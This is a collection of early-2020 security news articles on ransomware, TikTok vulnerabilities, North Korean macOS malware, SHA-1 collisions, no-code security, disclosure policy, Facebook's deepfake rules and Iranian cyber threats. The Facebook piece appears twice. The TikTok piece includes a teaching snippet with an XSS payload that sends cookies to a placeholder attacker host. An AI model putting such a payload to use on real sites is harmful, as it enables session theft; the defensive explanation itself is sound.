
15% of Ransomware Victims Paid Ransom in 2019, Quadrupling 2018

Increasing sophistication of ransomware attacks might be forcing victims to open their wallets.

Fewer survey respondents reported ransomware attacks in 2019 than in 2018, according to a recent Dark Reading survey. Yet the number reporting that they paid an attacker’s ransom nearly quadrupled, rising to 15% of those that had suffered a ransomware attack.

Ten percent of respondents stated that their organization had suffered a ransomware attack (down from 12% in the 2018 study). Of those, fifteen percent said that they paid the ransom, up from just 4% last year.   

Ransomware attacks are becoming increasingly severe and sophisticated. As Jai Vijayan wrote for Dark Reading last month:

Some recent developments include growing collaboration between threat groups on ransomware campaigns; the use of more sophisticated evasion mechanisms; elaborate multi-phase attacks involving reconnaissance and network scoping; and human-guided automated attack techniques. …

In many attacks, threat actors have first infected a target network with malware like Emotet and Trickbot to try and gather as much information about systems on the network as possible. The goal is to find the high-value systems and encrypt the data on them so victims are more likely to pay.

“If we look at the big picture, we will discover that what is changing is the threat actors’ approach to distributing the Trojans and selecting their victims,” says Fedor Sinitsyn, senior malware analyst at Kaspersky. “If five years ago almost all ransomware was mass-scale and the main distribution vector was via spam, nowadays many criminals are using targeted attacks instead.”

On a sunnier note, more companies might be paying ransoms because they have cyber insurers to help them bear the cost of those payments. As the police chief of Valdez, Alaska told Dark Reading after the city fell victim to ransomware, “I can’t emphasize enough how much [cyber insurance] saved our community.” 

Thirty-four percent of respondents to the Dark Reading report said they have insurance specifically for cyber incidents — double the number reported in 2017 — and 18% reported filing a claim.

Download the full report, How Data Breaches Affect the Enterprise, here. 

The Edge is Dark Reading’s home for features, threat data and in-depth perspectives on cybersecurity.

Article source: https://www.darkreading.com/edge/theedge/15--of-ransomware-victims-paid-ransom-in-2019-quadrupling-2018-/b/d-id/1335147?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

TikTok on the clock, and the hacking won’t stop: SMS spoofing vuln let baddies twiddle teens’ social media videos

TikTok, a mobile video app popular with teens, was vulnerable to SMS spoofing attacks that could have led to the extraction of private information, according to infosec researchers.

The app is used mainly by the youth of today to share and save short videos of themselves and friends, often set to a popular music track, with an optional array of visual and sound effects – a la Snapchat. Research from Israeli outfit Check Point found that an attacker could send a spoofed SMS message to a user containing a malicious link.

If the user clicked that malicious link, the attacker could access the user’s TikTok account and, so Check Point said, manipulate its content by deleting videos, uploading new videos and making private or “hidden” videos public.

Check Point told ByteDance, TikTok’s developer, of its findings in late November 2019. A patch was issued around a month later.

The vuln lay in how TikTok validated newly signed-up mobile phone numbers. When a new user signs up for TikTok, the app sends them an SMS. Check Point found that an attacker could send spoofed text messages, appearing to come from TikTok, to any phone number. Malicious links in those messages could then inject and trigger the execution of malicious code.

Oded Vanunu, Check Point’s head vuln researcher, opined: “Malicious actors are spending large amounts of money and time to try and penetrate these hugely popular applications – yet most users are under the assumption that they are protected by the app they are using.”

Luke Deshotels, a TikTok security staffer, said in a canned statement: “TikTok is committed to protecting user data. Before public disclosure, Check Point agreed that all reported issues were patched in the latest version of our app. We hope that this successful resolution will encourage future collaboration with security researchers.”

The research also found that a TikTok subdomain (https://ads.tiktok.com) was vulnerable to cross-site scripting (XSS), a type of attack in which malicious scripts are injected into otherwise benign and trusted websites. Check Point researchers leveraged this vulnerability to retrieve personal information saved on user accounts, including private email addresses and birthdates.
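The mechanics of a reflected XSS flaw of this kind can be sketched in a few lines of Python (the page and payload below are hypothetical illustrations, not TikTok’s actual code): a server interpolates user-controlled input into HTML without escaping it, and escaping the input neutralises the injected script.

```python
import html

def render_unsafe(name: str) -> str:
    # Vulnerable: user-controlled input is dropped straight into the page,
    # so any markup in it is interpreted by the browser.
    return f"<p>Hello, {name}!</p>"

def render_safe(name: str) -> str:
    # html.escape turns <, >, & and quotes into HTML entities, so injected
    # markup is displayed as inert text instead of being executed.
    return f"<p>Hello, {html.escape(name)}!</p>"

payload = "<script>fetch('https://evil.example/?c=' + document.cookie)</script>"
assert "<script>" in render_unsafe(payload)    # script would run in the victim's browser
assert "<script>" not in render_safe(payload)  # rendered as harmless text
```

Frameworks and templating engines typically do this escaping automatically; bugs like the one described above arise when a code path bypasses it.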

TikTok was banned by the US Army in late December over security fears, though those were publicly linked to its Chinese origins. ®

Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/01/08/tiktok_vulns_/

In a desperate bid to stay relevant in 2020’s geopolitical upheaval, N. Korea upgrades its Apple Jeus macOS malware

Malware hunters are sounding the alarm over a new, more effective version of the North Korean “AppleJeus” macOS software nasty.

Kaspersky Lab’s Global Research and Analysis Team has dissected what it says is a ‘sequel’ to the 2018 outbreak that targeted users of cryptocurrency sites for account theft.

Believed to be operating out of North Korea on behalf of the nation’s authoritarian government, the Lazarus group looks to bring cash into the sanction-hit government’s coffers by way of hacks on financial institutions, phishing and currency mining and theft operations.

To that end, AppleJeus sets its sights on cryptocurrency exchanges, where it masquerades as legitimate trading software in order to slip a remote access trojan onto victims’ machines. The infected boxes can then be pilfered for valuable files and account details.

In its latest incarnation, billed as a significant upgrade to the 2018 version, AppleJeus is able to circumvent authentication requests while doing its dirty work, thus making it harder for the user to see something is amiss and stop the attack.

“We identified significant changes to the group’s attack methodology,” the Kaspersky team explained. “To attack macOS users, the Lazarus group has developed homemade macOS malware, and added an authentication mechanism to deliver the next stage payload very carefully, as well as loading the next-stage payload without touching the disk.”

The malware uses GitHub to host malicious applications, and its writers have shifted to using Objective-C instead of the Qt framework for the attack code.


So far, the macOS infection has been spotted operating under the names JMTTrading and UnionCryptoTrader, and in addition to proliferating on a number of cryptocoin exchanges, the malware has been spotted in the wild on machines in the UK, Poland, Russia, and China. As this is a financially-motivated attack, the group is likely trying to infect as many cryptocoin investors and exchanges as possible.

Lazarus was also found to be tinkering with the Windows version of the malware. In that case, the malware was found to be spreading via the Telegram messenger. Like the macOS malware, the Windows build disguises its backdoor installer as a legitimate cryptocurrency trading app called ‘UnionCryptoTrader’.

“The binary infection procedure in the Windows system differed from the previous case. They also changed the final Windows payload significantly from the well-known Fallchill malware used in the previous attack,” the researchers noted.

“We believe the Lazarus group’s continuous attacks for financial gain are unlikely to stop anytime soon.” ®

Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/01/08/applejeus_malware_returns/

Hash snag: Security shamans shame SHA-1 standard, confirm crucial collisions citing circa $45k chip cost

SHA-1 stands for Secure Hash Algorithm but version 1, developed in 1995, isn’t secure at all. It has been vulnerable in theory since 2004 though it took until 2017 for researchers at CWI Amsterdam and Google to demonstrate a practical if somewhat costly collision attack.

Last year, crypto-boffins Gaëtan Leurent, from Inria in France, and Thomas Peyrin, from Nanyang Technological University in Singapore, proposed [PDF] a more robust technique, a chosen-prefix collision attack.

And this week, at the Real World Crypto Symposium in the US, they described how they made it work.

“This more powerful attack allows to build colliding messages with two arbitrary prefixes, which is much more threatening for real protocols,” said Leurent and Peyrin in a paper, SHA-1 is a Shambles, presented at the conference.

A hash algorithm is a function that mathematically maps input data to another value of fixed length. Think of it as one-way encryption: you convert your input data, however long it is, into a summary or fingerprint that has a set size, with no way of recreating the original from this hash. Changing even a small part of the input data produces a significant change in hash, ideally. The hash is usually a lot smaller than the input.
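The fixed-size, one-way behaviour described above is easy to see with Python’s standard hashlib module (a generic illustration using SHA-256, not the broken SHA-1):

```python
import hashlib

# The digest length is fixed no matter how long the input is.
short = hashlib.sha256(b"hi").hexdigest()
long_ = hashlib.sha256(b"x" * 1_000_000).hexdigest()
assert len(short) == len(long_) == 64  # 256 bits = 64 hex characters

# A tiny change to the input yields a completely different digest
# (the "avalanche effect" the article alludes to).
a = hashlib.sha256(b"hello world").hexdigest()
b = hashlib.sha256(b"hello world!").hexdigest()
assert a != b
```

Going the other way, from a digest back to an input, is computationally infeasible for a secure hash, which is what makes the collisions described below so damaging when they become practical.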

Hashes are thus used for authentication and related applications: by comparing hashes, you can be sure data hasn’t been tampered with while in transit, for instance. A hash collision occurs when two separate inputs produce the same output – obviously not desirable if you’re checking, say, a stored hash of a password against a hash of a user-supplied password and you want only one specific password to provide access.
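That password-checking scenario can be sketched in a few lines of Python (the function and variable names are hypothetical, and a real system should use a salted, deliberately slow KDF such as scrypt rather than a bare hash):

```python
import hashlib
import hmac

def verify_password(stored_digest: bytes, supplied: bytes) -> bool:
    """Accept a login if the supplied password hashes to the stored digest."""
    digest = hashlib.sha256(supplied).digest()
    # compare_digest performs a constant-time comparison, avoiding timing leaks.
    return hmac.compare_digest(stored_digest, digest)

stored = hashlib.sha256(b"correct horse battery staple").digest()
assert verify_password(stored, b"correct horse battery staple")
assert not verify_password(stored, b"guess")
# Any *different* input that produced the same digest (a collision)
# would also pass this check, which is why collision resistance matters.
```

The same logic applies to signature schemes: if two documents hash to the same value, a signature over one is indistinguishable from a signature over the other.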

A chosen-prefix collision, because it allows the attacker to choose the prefixed content, represents a more serious threat.

Back in 2012, the same year America’s National Institute of Standards and Technology (NIST) advised against using SHA-1 for applications that require collision resistance, cryptographer Bruce Schneier estimated that the cloud computing bill for carrying out a SHA-1 attack would be about $2.77m. And he projected the cost would fall to about $43,000 by 2021.

In their paper, Leurent and Peyrin put the theoretical cost at $11,000 for a SHA-1 collision and $45,000 for a chosen-prefix collision. To actually carry out their attack required two months of computation time using 900 Nvidia GTX 1060 GPUs. The boffins paid about $75,000 because GPU prices were higher at the time and because they wasted time during attack preparation.

Their attack involved creating a pair of PGP/GnuPG keys with different identities, but colliding SHA-1 certificates, allowing them to impersonate a victim and digitally sign documents in the victim’s name.

“Our work shows that SHA-1 is now fully and practically broken for use in digital signatures,” the researchers state in their paper. “GPU technology improvements and general computation cost decrease will quickly render our attack even cheaper, making it basically possible for any ill-intentioned attacker in the very near future.”

Much of the technical community has already taken action to avoid SHA-1 in vulnerable contexts. Web browsers like Chrome and Firefox stopped accepting SSL SHA-1 certificates in early 2017, followed by Edge and Internet Explorer a few months later.

In November last year, Apple said it would no longer trust SHA-1 certificates in macOS 10.15 and iOS 13. Microsoft took similar steps last year as well.

Usage of SHA-1 is low – Leurent and Peyrin claim about 1 per cent of website certificates still rely on it, down from 20 per cent in 2017. Nonetheless, SHA-1 signatures are still supported in many applications.

“SHA-1 is the default hash function used for certifying PGP keys in the legacy branch of GnuPG (v 1.4), and those signatures were accepted by the modern branch of GnuPG (v 2.2) before we reported our results,” they note. “Many non-web TLS clients also accept SHA-1 certificates, and SHA-1 is still allowed for in-protocol signatures in TLS and SSH.”

Leurent and Peyrin contacted several affected vendors in the spirit of responsible disclosure, but say they could not notify everyone. GnuPG patched the problem in its November 25, 2019 release so that SHA-1-based identity signatures created after 2019-01-19 are no longer valid.


The researchers note that even if SHA-1 usage is low, miscreant-in-the-middle attacks may downgrade connections to SHA-1. Also, SHA-1 continues to be the foundation of the Git version control system. CAcert, a Certificate Authority for PGP keys, has acknowledged the researchers’ concerns but not yet dealt with the issue. And OpenSSL developers, the researchers say, are considering disabling SHA-1 for the security level 1 setting, which calls for at least 80-bit security (SHA-1 produces a 160-bit hash value).

Back in 2017, Git creator Linus Torvalds dismissed concerns about attacks on Git SHA-1 hashes. GitHub, Microsoft’s hosted Git service, offered similar reassurance, noting in a blog post that it had implemented collision detection for each hash it computes and that the open source Git project is developing a plan to move away from SHA-1.

GitHub did not immediately respond to a request for comment.

Evidence of efforts to implement SHA-256 can be seen on the Git mailing list, but the work appears to be ongoing. At the moment, Git developers advise using the collision detection library developed in 2017 and implemented by GitHub to check repo integrity. ®

Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/01/08/hash_slamming_security_shamans/

In App Development, Does No-Code Mean No Security?

No-code and low-code development platforms are now part of application development, but there are keys to making sure they don’t leave security behind along with traditional coding.


The new trend in enterprise application development: creating new applications without writing code. “Low-code” or “no-code” development platforms offer the promise of rapid application development — often by business-unit or subject-matter experts — without the overhead of traditional development by traditional developers.

The question is whether no-code also means no security.

From content management systems like WordPress to enterprise application builders like Appian, no/low-code platforms are intended to allow developers to focus on the application logic while the details of device, delivery network, and user interfaces are left to the platform. “Low-code and no-code development models are powerful and democratize development for non-technical users to easily build powerful workflows,” says Vinay Namidi, senior director of project management at Virsec. “But there’s always a gotcha — while trained developers may have varying levels of skill in security, no-code developers are generally oblivious to security best practices or risks.”

Does training matter?

While business unit developers may not have the security expertise of trained enterprise software developers, the operating assumption is that the platforms themselves build security into the final product. “The onus moves onto the framework from the [platform] developers, so [the platform users] don’t have to understand secure coding,” explains Jason Kent, hacker in residence at Cequence. “But that assumes that the framework is written securely.”

That assumption can be a good one, if the framework is being used the way it was intended.

Ali Golshan, CTO and co-founder at StackRox, feels that smaller companies with limited development staff, and lines of business creating applications that are not enterprise-critical, are good use cases because “…there’s a huge step up [in security] because there is a common denominator as far as security best practices and implementations that framework providers build into their own SDLC [software development lifecycle].”

The common denominator in security can include some of the basic functions that should be part of secure application development but are often overlooked. “[No-code development] also has the advantage of raising the security barrier since most lower-level vulnerabilities, stemming from the lack of input validation and code integrity checks, are taken care of by the platform,” says Mounir Hahad, head of Juniper Threat Labs at Juniper Networks.
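As a concrete, hypothetical sketch of the kind of input validation such a platform might generate automatically before form data ever reaches the application logic (the form fields and rules here are illustrative assumptions, not any vendor’s actual implementation):

```python
import re

# Hypothetical server-side checks a no/low-code platform might generate
# for a signup form, so the citizen developer never has to write them.
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")

def validate_signup(form: dict) -> list:
    """Return a list of validation errors; an empty list means the input passed."""
    errors = []
    if not EMAIL_RE.match(form.get("email", "")):
        errors.append("invalid email")
    age = form.get("age", "")
    if not (age.isdigit() and 13 <= int(age) <= 120):
        errors.append("invalid age")
    return errors

assert validate_signup({"email": "a@b.co", "age": "30"}) == []
assert validate_signup({"email": "nope", "age": "-1"}) == ["invalid email", "invalid age"]
```

The point of the quote above is that checks like these come for free with the platform; what the platform cannot supply is the business-logic-level judgment about which data should be exposed to whom.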

But those things don’t take responsibility for security away from the application development team.

Best no-code practices

“In no way does this solve the general problem of securing an application,” Hahad says, continuing, “Patching for vulnerable subsystems and third-party code still needs to be done, for example.”

The same characteristics that make no-code development so productive for some organizations can bring challenges when it comes to security. “With no-code platforms, enterprises quickly lose visibility over critical processes and data usage, and users can easily build business logic that exposes sensitive or regulated information,” says Namidi. He says that organizations using no-code development must make specific plans for security (and regulatory compliance) from the beginning of the process.

“Enterprises must find ways to audit processes and vendors, and maintain reasonable security oversight, even if that makes the process a bit less convenient,” Namidi says.

As part of the audit and security process, Golshan points out that knowing what’s actually going on within the application is important.

“You want to deploy your application on top of a cloud native environment where there is some notion of deep logging,” he says, explaining that tracing and building support for microservices environments is critical.

Partnerships matter

To keep “no-code” from becoming synonymous with “shadow IT,” a deep partnership between the team building the applications and the organization’s security team is important. “There’s a lot of resistance on the security side and developer side to make that first step, but it’s critical. It’s critical for organizations to encourage that,” says Matt Keil, director of product marketing at Cequence.

Keil says that the introduction of no-code development can actually be the impetus for starting the critical conversation between security and the developers. “I think the right approach is to engage with the business group in a conversation. Don’t act like ‘Doctor No’ that’s just going to continue to foster the divide between security and the development team,” he continues.

Among the areas that Golshan feels should be considered are those that control who (and what) has access to the application. “I think one of the areas that low-code/no-code has the potential to really improve is how it handles access management, authentication, and authorization,” he says.

And for all of the areas that should be considered, experts point back to the documents produced by NIST as useful frameworks for organizations to lean on. While some consider the NIST documents as being useful primarily for government organizations, the principles can be valuable for any organization, especially those looking to develop in a new methodology.

Ultimately, though, the best chance for success may be to have someone who makes sure the organization doesn’t forget security. “The most successful organizations that I see have an application security architect — somebody with a foot in security and a foot in development,” says Kent. “They can more easily identify and define the kinds of controls that you need to make low-code/no-code environments secure and still collaborative.”


Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and …

Article source: https://www.darkreading.com/edge/theedge/in-app-development-does-no-code-mean-no-security-/b/d-id/1336740?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

TikTok Bugs Put Users’ Videos, Personal Data At Risk

Researchers found it was possible to spoof SMS messages from TikTok and exploit an API flaw that could grant access to users’ personal data.

Check Point Research analysts have discovered multiple vulnerabilities in the TikTok video sharing app that could have enabled attackers to manipulate users’ videos and access personal information. ByteDance, the developer behind TikTok, has since deployed fixes for these flaws.

TikTok lets its massive user base – primarily teenagers and kids – record, save, and share videos they can choose to make public or keep private. The app has more than one billion global users and availability across more than 150 markets and 75 languages. As of Oct. 2019, researchers report, TikTok was one of the most frequently downloaded applications around the world.

The vulnerabilities Check Point discovered could let intruders gain access to TikTok accounts and manipulate their content. Attackers could delete videos; upload unauthorized videos; make private videos public; and access data including full name, email address, and birthdate.

“We found a chain of vulnerabilities,” says Oded Vanunu, head of products vulnerability research at Check Point. “The entire application business logic had a big lack of security. We saw that easily, bad actors can take control of an account, change videos from private to public, [and] leak private information. In this platform, this is a big deal.”

One of the possible attack vectors is SMS link spoofing: a bug in the app’s infrastructure made it possible to send an SMS message to any phone number on behalf of TikTok. Users who visit TikTok’s website can enter their phone number to receive a text with a link to download the app. An attacker could exploit this process to spoof SMS through TikTok infrastructure and send a malicious link to potential victims; if a victim clicked it, the attacker could gain access to their videos.

“Once [the attacker] sends an SMS to a user and adds some URL coming from TikTok, the user clicks the URL and the attacker has the account,” Vanunu explains, noting an attacker could also spoof TikTok to send a malicious link through WhatsApp, Gmail, or another messaging app.

Researchers also found it was possible to send victims a link that could redirect them to a malicious website, a process that creates the possibility of cross-site scripting (XSS), cross-site request forgery (CSRF), and sensitive data exposure attacks without user consent. Through XSS and link spoofing, they could execute JavaScript code on behalf of any victim who clicks a malicious link.

In addition to discovering ways to add and delete videos, as well as switch videos from private to public, researchers found several API calls in different TikTok subdomains. Making requests to these APIs could reveal sensitive information including users’ payment data, email addresses, and birthdates. Users generally have no indication their account is being manipulated unless they spot unauthorized videos or notice private content has been switched to public, says Vanunu.

After the team analyzed these vulnerabilities, they brought their findings to TikTok in Nov. 2019. ByteDance took two to three weeks to fix the bugs and infrastructure issues they discovered.

“TikTok is committed to protecting user data,” says Luke Deshotels, PhD, of the TikTok security team in a statement to Check Point. “Like many organizations, we encourage responsible security researchers to privately disclose zero day vulnerabilities to us. Before public disclosure, Check Point agreed that all reported issues were patched in the latest version of our app.”

Check Point has spent the last two years investigating technologies and platforms that serve hundreds of millions of users, Vanunu says. “We’re clearly seeing, in cyberspace, that bad actors are putting a lot of effort financially, and from a research perspective, to find vulnerabilities on these platforms to distribute malicious activity.”

This isn’t the first time Chinese-owned TikTok has sparked security concerns: late last year, US lawmakers called for an assessment of risks posed by the app, which they fear may give Chinese intelligence a means of spying on users’ phones. The US Army, which once used TikTok as a recruiting tool, has banned soldiers from using the app. It’s now considered a security threat.


Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “Car Hacking Hits the Streets.”

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial …

Article source: https://www.darkreading.com/application-security/tiktok-bugs-put-users-videos-personal-data-at-risk/d/d-id/1336745?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Google’s Project Zero Policy Change Mandates 90-Day Disclosure

The updated disclosure policy aims to achieve more thorough and improved patch development, Google reports.

Google’s Project Zero, a division focused on security research, today announced changes to its disclosure policy. Details of all vulnerabilities will now be released 90 days after they are reported by default, regardless of when a bug is fixed, unless Project Zero and the vendor agree otherwise.

The 90-day disclosure deadline has existed for five years and accelerated patch development. When Project Zero began in 2014, some vulnerabilities took longer than six months to address. Last year, 97.7% of issues were addressed under the 90-day deadline. Still, the division recognizes there is progress to be made in patch development and vulnerability management.

Now it is trialing a new policy for bugs reported starting January 1, 2020. Project Zero’s old guidelines allowed vulnerability details to be released when the bug was fixed, even if that was ahead of day 90. Its new policy eliminates early disclosure by default: details will be released on day 90 for all bugs. If there is mutual agreement between the vendor and Project Zero, bug reports can be released to the public before the 90-day deadline, researchers report in a blog post.

The goal is to provide a more consistent and fair way to release patches, wrote Project Zero’s Tim Willis in a blog post. While faster patch development remains a goal, the team is now placing equal focus on thorough patch development and broad adoption. It also hopes to create equity among vendors so no one company, including Google, gets preferential treatment.

“Too many times, we’ve seen vendors patch reported vulnerabilities by ‘papering over the cracks’ and not considering variants or addressing the root cause of a vulnerability,” Willis explained. A focus on “faster patch development” may exacerbate this issue, he continued, enabling attackers to adjust their exploits and continue launching attacks.

Further, Willis pointed out, patches must be applied in order to be effective. “To this end, improving timely patch adoption is important to ensure that users are actually acquiring the benefit from the bug being fixed.” With the mandated 90-day window, the hope is that vendors will be able to offer updates and encourage more people to install fixes within 90 days.

Project Zero will test this policy for 12 months then consider whether to make it a long-term change. Read more details in the full blog post here.


Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article.

Article source: https://www.darkreading.com/application-security/googles-project-zero-policy-change-mandates-90-day-disclosure/d/d-id/1336748?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Facebook bans deepfakes, but not cheapfakes or shallowfakes

Facebook has banned deepfakes.

No, strike that – make it, Facebook has banned some doctored videos, but only the ones made with fancy-schmancy technologies, such as artificial intelligence (AI), in a way that an average person wouldn’t easily spot.

What the policy doesn’t appear to cover: videos made with simple video-editing software, or what disinformation researchers call “cheapfakes” or “shallowfakes.”

The new policy

Facebook laid out its new policy in a blog post on Monday. Monika Bickert, the company’s vice president for global policy management, said that while these videos are still rare, they present “a significant challenge for our industry and society as their use increases.”

She said that going forward, Facebook is going to remove “misleading manipulated media” that’s been “edited or synthesized” beyond minor clarity/quality tweaks, in ways that an average person can’t detect and which would depict subjects as convincingly saying words that they actually didn’t utter.

Another criterion for removal is that part about fancy-schmancy editing techniques, when a video…

…is the product of artificial intelligence or machine learning that merges, replaces or superimposes content onto a video, making it appear to be authentic.

Deepfake non-consensual porn made up 96% of the total number of deepfake videos online as of the first half of 2019, according to Deeptrace, a company that uses deep learning and computer vision for detecting and monitoring deepfakes.

As far as Facebook policy is concerned, those are redundant. The platform already forbids adult nudity and sexual activity.

Facebook will be using its own staff, as well as independent fact-checkers, to judge a video’s authenticity.

Facebook says it won’t take down slurring Pelosi cheapfake

Given the latitude the new policy gives to satire, parody, or videos altered with simple/cheapo technologies, it might mean that some pretty infamous, and widely shared, cheapfakes will be given a pass and left on the platform.

Which, as the Washington Post notes, could mean that a video that, say, got slowed down by 75% – as was the one that made House Speaker Nancy Pelosi look drunk or ill – may pass muster.

In fact, Facebook confirmed to Reuters that the shallowfake Pelosi video isn’t going anywhere. In spite of the thrashing critics gave Facebook for refusing to delete the video – which went viral after being posted in May 2019 – Facebook said in a statement that it didn’t meet the standards of the new policy, since it wasn’t created with AI:

The doctored video of Speaker Pelosi does not meet the standards of this policy and would not be removed. Only videos generated by artificial intelligence to depict people saying fictional things will be taken down.

Drew Hammill, Pelosi’s Deputy Chief of Staff, criticized Facebook’s new policy, saying that it misses the mark when it comes to tackling fake news.

Nor does Facebook seem to be ready to censure cheapfakes that are the result of mislabeled footage, spliced dialogue or quotes taken out of context. Last week, we saw one such example: a heavily edited video that made presidential candidate Joe Biden come off like a white nationalist. The video went viral on Thursday, with at least one Twitter share reportedly retweeted more than 1 million times.

On Tuesday, Bill Russo, Joe Biden’s former 2020 spokesman, dubbed the new policy an “illusion of progress.” The Post quoted him:

Facebook’s policy does not get to the core issue of how their platform is being used to spread disinformation, but rather how professionally that disinformation is created.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/7w8AhUNJatM/

Facebook bans deepfakes, but not cheapfakes or shallowfakes

Facebook has banned deepfakes.

No, strike that – make it, Facebook has banned some doctored videos, but only the ones made with fancy-schmancy technologies, such as artificial intelligence (AI), in a way that an average person wouldn’t easily spot.

What the policy doesn’t appear to cover: videos made with simple video-editing software, or what disinformation researchers call “cheapfakes” or “shallowfakes.”

The new policy

Facebook laid out its new policy in a blog post on Monday. Monika Bickert, the company’s vice president for global policy management, said that while these videos are still rare, they present “a significant challenge for our industry and society as their use increases.”

She said that going forward, Facebook is going to remove “misleading manipulated media” that’s been “edited or synthesized” beyond minor clarity/quality tweaks, in ways that an average person can’t detect and which would depict subjects as convincingly saying words that they actually didn’t utter.

Another criterion for removal is the one about fancy-schmancy editing techniques: a video will be taken down if it…

…is the product of artificial intelligence or machine learning that merges, replaces or superimposes content onto a video, making it appear to be authentic.

Deepfake non-consensual porn made up 96% of the total number of deepfake videos online as of the first half of 2019, according to Deeptrace, a company that uses deep learning and computer vision for detecting and monitoring deepfakes.

As far as Facebook policy is concerned, those are redundant. The platform already forbids adult nudity and sexual activity.

Facebook will be using its own staff, as well as independent fact-checkers, to judge a video’s authenticity.

Facebook says it won’t take down slurring Pelosi cheapfake

Given the latitude the new policy gives to satire, parody, or videos altered with simple/cheapo technologies, it might mean that some pretty infamous, and widely shared, cheapfakes will be given a pass and left on the platform.

Which, as the Washington Post notes, could mean that a video that, say, got slowed to about 75% of its original speed – as was the one that made House Speaker Nancy Pelosi look drunk or ill – may pass muster.

In fact, Facebook confirmed to Reuters that the shallowfake Pelosi video isn’t going anywhere. In spite of the thrashing critics gave Facebook for refusing to delete the video – which went viral after being posted in May 2019 – Facebook said in a statement that it didn’t meet the standards of the new policy, since it wasn’t created with AI:

The doctored video of Speaker Pelosi does not meet the standards of this policy and would not be removed. Only videos generated by artificial intelligence to depict people saying fictional things will be taken down.

Drew Hammill, Pelosi’s Deputy Chief of Staff, criticized Facebook’s new policy, saying that it misses the mark when it comes to tackling fake news.

Nor does Facebook seem ready to censure cheapfakes that rely on mislabeled footage, spliced dialogue, or quotes taken out of context. Last week, we saw one such video: a heavily edited clip that made presidential candidate Joe Biden come off like a white nationalist. It went viral on Thursday, with at least one Twitter share reportedly being retweeted more than 1 million times.

On Tuesday, Bill Russo, a spokesman for Joe Biden’s 2020 campaign, dubbed the new policy an “illusion of progress.” The Post quoted him:

Facebook’s policy does not get to the core issue of how their platform is being used to spread disinformation, but rather how professionally that disinformation is created.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/7w8AhUNJatM/

US warns of Iranian cyber threat

The US Department of Homeland Security has issued a total of three warnings in the last few days encouraging people to be on the alert for physical and cyber attacks from Iran. The announcements follow the US killing of Qasem Soleimani, the commander of Iran’s IRGC-Quds Force. The warnings directly address IT professionals with advice on how to secure their networks against Iranian attack.

On Monday, the Cybersecurity and Infrastructure Security Agency (CISA), which is an agency within the DHS, released the latest publication in its CISA Insights series, which provides background information on cybersecurity threats to the US.

Without explicitly mentioning Soleimani’s killing, it referred to “recent Iran-US tensions” creating a heightened risk of retaliatory acts against the US and its global interests. It warned organizations to be on the lookout for potential threats, especially those in strategic sectors such as finance, energy, or telecommunications. Iranian attackers could target intellectual property or mount disinformation campaigns, it said, while also raising the spectre of physical attacks using improvised explosive devices or unmanned drones.

The publication added:

Review your organisation from an outside perspective and ask the tough questions – are you attractive to Iran and its proxies because of your business model, who your customers and competitors are, or what you stand for?

The same day, CISA also issued an alert specifically targeting IT pros that warned of a potential Iranian cyber response to the military strike. It recommended five actions that IT professionals could take to protect themselves, focusing on a mixture of vulnerability mitigation and incident preparation.

IT pros should:

Disable all unnecessary ports and protocols. Reducing the network attack surface, along with monitoring open ports for command and control activity, will help to reduce network vulnerability and spot potential attackers rattling the doors.

Enhance monitoring of network and email traffic. Restricting attachments and reviewing signatures for malware and phishing themes will help to stop attackers reaching users.

Patch externally facing equipment. Focus on critical vulnerabilities, the Agency warned, especially those that enable remote code execution or denial of service on public-facing equipment.

Log and limit PowerShell use. This powerful Microsoft command line tool is a known asset for online attackers who use it to navigate their way around target systems.

Keep backups updated. This means maintaining air-gapped backup files not reachable by ransomware.
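The first of those steps – disabling unnecessary ports and keeping an eye on what’s actually listening – is easy to spot-check. Here’s a minimal sketch (not CISA’s tooling; the `EXPECTED_PORTS` allow-list is a hypothetical example) that probes a host for open TCP ports and flags any that aren’t on the list:

```python
import socket

# Hypothetical allow-list: TCP ports this host is expected to expose.
EXPECTED_PORTS = {22, 443}

def audit_open_ports(host="127.0.0.1", ports=range(1, 1025), timeout=0.2):
    """Return the set of TCP ports on `host` that accept a connection."""
    open_ports = set()
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 when the connection succeeds,
            # i.e. something is listening on that port.
            if s.connect_ex((host, port)) == 0:
                open_ports.add(port)
    return open_ports

def unexpected_ports(host="127.0.0.1"):
    """Open ports that are not on the allow-list and deserve a look."""
    return audit_open_ports(host) - EXPECTED_PORTS
```

Anything this turns up that isn’t on the allow-list is a candidate for shutting down – or, per the alert, for closer monitoring as possible command-and-control activity. Real-world audits would of course use dedicated tools rather than a 20-line script, but the principle is the same.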

The publication and alert follow a National Terrorism Advisory System (NTAS) bulletin released on 4 January that mentioned the Soleimani strike and noted that Iran’s leaders along with affiliated organisations had vowed revenge against the US.

An attack in the homeland may come with little or no warning.

The US killed Qasem Soleimani using a Reaper drone on 3 January. The strike, which congressional leaders condemned, followed mounting rocket attacks against US bases in Iraq over the past two months.

Experts both in and outside the US government have long identified Iran as a source of malicious cyber activity. Last year, an analysis highlighted an increased focus on industrial control systems from the country’s APT33 hacking group. Almost exactly a year before, the US charged Iranian hackers for their role in an attack using the SamSam ransomware.

Over the weekend, hackers claiming Iranian backing defaced the US government’s Federal Depository Library Program website with a picture of a bloodied president Trump. On Tuesday, intruders altered the Texas Department of Agriculture’s website with a message stating “Hacked by Iranian Hacker”.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/jQIIJJ29FVQ/